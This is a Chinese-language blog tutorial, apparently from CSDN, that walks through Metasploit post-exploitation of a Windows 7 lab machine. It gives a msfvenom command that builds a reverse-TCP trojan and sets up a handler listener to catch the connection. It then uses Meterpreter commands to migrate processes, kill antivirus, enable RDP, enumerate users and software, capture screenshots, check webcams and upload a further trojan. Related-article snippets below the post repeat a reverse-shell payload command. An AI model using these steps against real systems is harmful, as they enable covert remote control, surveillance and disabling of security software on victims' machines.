Metapsloit后渗透Windows攻击(亲测metepreter使用教程)

已于 2022-04-03 11:40:15 修改
阅读量5.9k 收藏 8
点赞数 3
分类专栏: 安全渗透 文章标签: 网络 服务器 安全 web安全 系统安全
于 2022-04-02 14:09:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanqianshao/article/details/123917557
版权

Meterpreter是什么?

在Metasploit Framework中,Meterpreter是一种后渗透工具,它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的,它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。

如何进入meterpreter?

实验环境:

  • kali metasploit 192.168.31.135
  • windows7 192.168.31.160

实验步骤:
在这里插入图片描述

msfvenom -p windows/x64/metepreter/reverse_tcp lhost=192.168.31.135 lport=1234 -f  exe > /hacker.exe
#生成木马
#lhost 本地地址
#lport 取0-65535中占用地址即可
#-f exe 指定木马文件类型hacker.exe

在这里插入图片描述

use exploit/multi/hander #选择漏洞利用模块

在这里插入图片描述

set payload windows/meterpreter/reverse_tcp #选择攻击载荷
set lhost #设置反向代理ip
set lport #设置端口

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用kali自带python搭建8000端口的服务器,Windows7访问服务器获取木马文件自动运行

在这里插入图片描述

获取meterpreter shell!

在刚获得Meterpreter shell时,该shell是极其脆弱和易受攻击的
在这里插入图片描述
在这里插入图片描述

#输入getpid获取Meterpreter shell的进程号
#输入命令获取目标及正在运行的进程

在这里插入图片描述

#输入migrate 1932 命令把shell移动到PID为1932的Explorer.exe的进程里,因为该进程是个稳定的进程。

在这里插入图片描述
在这里插入图片描述

#先输入sysinfo命令查看目标及的系统信息例如操作系统和体系架构
#输入run /post/windows/gather/checkvm命令查看目标是否运行在虚拟机上

在这里插入图片描述

#接着输入route命令可以查看目标完整的网络设置

在这里插入图片描述

#使用run post/windows/manage/killav可以关闭目标系统的杀毒软件

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

#输入 run post/windows/manage/enable_rdp启动目标的远程桌面协议,也就是常说的3389端口
#接着 run post/windows/gather/enum_logged_on_users列举当前有多少用户登录了目标
#继续 run post/windows/gather/enum_applications列举安装在目标上的应用程序

在抓取屏幕截图前需要用到扩展插件Espia,使用前要先输入load espia命令加载该插件,然后输入screengrab命令就可以抓取此使目标的屏幕截图
在这里插入图片描述
抓取成功后生成一个名为DYysaHbh的图片保存在root目录下,这里输入screenshot命令也可以达到同样的效果
在这里插入图片描述
查看目标有没有摄像头的命令为webcam_list
在这里插入图片描述
在这里插入图片描述

由于我目标Windows7无图像设备所以摄像头图像无法抓取

在这里插入图片描述
在这里插入图片描述

#可以输入shell命令进入目标的shell下,同时也支持各种文件系统命令

在这里插入图片描述

#upload /root/hack.exe c:\ 上传攻击机root目录下的木马文件到目标的c盘下
李昕泽不是程序员
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
Meterpreter使用详解
悦分享
11-23 135
Meterpreter是一种先进的,可动态扩展的有效负载,它使用内存中的 DLL注入阶段,并在运行时通过网络扩展。它通过stager套接字进行通信并提供全面的客户端Ruby API。它包含命令历史记录,制表符完成,频道等。Metepreter最初由Metasploit 2.x的skape编写,常见的扩展名合并为3.x,目前正在对Metasploit 3.3进行大修。服务器部分以纯C实现,现在使用MSVC进行编译,使其具有一定的便携性。
渗透测试window7,加强木马防范意识
yuanyuan2223的博客
04-06 5546
渗透测试window7,加强木马防范意识 通过钓鱼网站给win7系统植入后门并控制的流程 一、知识点总结: 1 生成后门程序 2 通过钓鱼方式植入木马靶机(社工) 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么 二、用到的系统和工具: 1 Kali(系统); 2 Windows7(靶机系统); 3 Metasploit(渗透工具); 4 msfvenom(Metasploit自带的后门生成模块); 5 Meterpreter(后渗透常用通道); 三、使用msfvenom开始生成木马
易语言内存DLL注入模块
08-16
易语言内存DLL注入模块源码 系统结构:释放进程内存,注入DLL,取DLL函数地址,执行DLL函数,卸载DLL,是否已注入,重载变量,申请内存_,释放内存_,写到内存_,读取内存_,写入内存数据_,调用子程序
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 7337
MeterpreterMetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 3033
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
MSF(Metasploit)渗透测试---黑客工具使用指南
最新发布
GitHub质检员
11-17 325
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。
第四期_Metasploit 基础(六)Meterprete《Metasploit Unleashed Simplified Chinese version(Metasploit官方文档教程中文版)》
Sno_WolF的博客
02-04 1177
四、METASPLOIT 基础 6. Meterpreter Meterpreter 是一种高级的、动态可扩展的有效负载,它使用内存中的 DLL 注入stagers并在运行时通过网络扩展。它通过stager程序套接字进行通信,并提供全面的客户端 Ruby API。它具有命令历史记录,选项卡完成,通道等功能。 Metepreter最初是由skape为Metasploit 2.x编写的,常见的扩展被合并到3.x中,目前正在对Metasploit 3.3进行大修。服务器部分以纯C语言实现,现在使用MSVC编译,使
Metasploit(三) Meterpreter基础知识
u010680986的博客
08-29 1430
攻击前期步骤: 1. 启动msfconsole:命令行输入use exploit/windows/smb/ms08_067_netapi 2. 可以通过show options查看设置的条件,默认远程主机不会有内容,需要手动设置,通过set RHOST ip 进行设置目标主机地址,端口也可以设置,设置完成后,可以看到如下图,上面是目标主机的ip和端口信息,下面是本地信息 3. 设置完毕后,输入exploit就可以进入meterpreter shell 基本命令 输入help可以查看所有Met.
Meterpreter命令详解
热门推荐
eli的博客
05-18 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
永恒之蓝漏洞复现(二)对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
wty923的博客
01-12 1695
对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2174
windows payload 反弹shell
MSF——Meterpreter(三)
dishan4749253的博客
09-09 587
MSF系列: MSF——基本使用和Exploit模块(一) MSF——Payload模块(二) MSF——Meterpreter(三) MSF——信息收集(四) 一、简介 MeterpreterMetasploit提供的一个非常强大的后渗透工具 Meterpreter可以看成特殊的Payload,之前我们的Payload都是为了获得目标系统的shell 这里...
最强的渗透攻击平台——Metasploit
YT的博客
01-31 3668
Metasploit v4版本体系结构 基础库文件:Metasploit的基础库文件位于源码根目录路径下的libraries目录中,包括Rex、framewo-core和framewo-base三部分。 Rex(Ruby Extension)是整个Metasploit框架所依赖的最基础的一些组件,为Metasploit开发者进行框架和模块开发提供了一些基础功能的支持,如包装的网络套接字、网络...
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 5350
meterpreter使用攻略(持续更新中)
小白Kali渗透Windows XP专业版SP3
m0_70497070的博客
09-17 1674
小白学Kali?机会来了!
Meterpreter 提权
eli的博客
05-20 2038
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
渗透之——Meterpreter以被控制的计算机为跳板渗透其他服务器
冰河的专栏
01-14 2363
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86475550 攻击机:Kali 192.168.75.10 跳板: Metasploitable2 192.168.75.130 目标机: Windows Server 2012 192.168.75.140 这里无法通过Kali(192.168.75.10)主机直接访问...
Metasploit渗透测试框架基础
hanjinming110的博客
03-02 1951
MSF渗透测试框架基础
第七章、Metasploit渗透测试框架的基本使用
m0_73780812的博客
05-18 333
4、模块相关命令show(show命令的有效参数是:all,encoders,nops,exploits,payloads,auxiliary,post,plugins,info,options)2、使用name关键字查询(只有Name中有的)模块。mysql路径下所有的可利用mysql模块。5、search命令寻找相关模块。9、查看可以攻击哪些操作系统。7、模块相关命令use使用。11、查看设置了那些值。3、怎么筛选漏洞模块。装载一个渗透攻击模块。10、查看攻击目标主机。4、通过路径查找模块。
metepreter命令
sunshine19871211的博客
04-14 955
https://xz.aliyun.com/t/2536 meterpreter渗透命令 background 将会话切换到后台 sessions -l sessions -i 2 启动一个shell或一个meterpreter sessions -k 2 杀死shell upload /root/桌面/payload.txt c: edit payload.txt cat ls c: ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李昕泽不是程序员

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值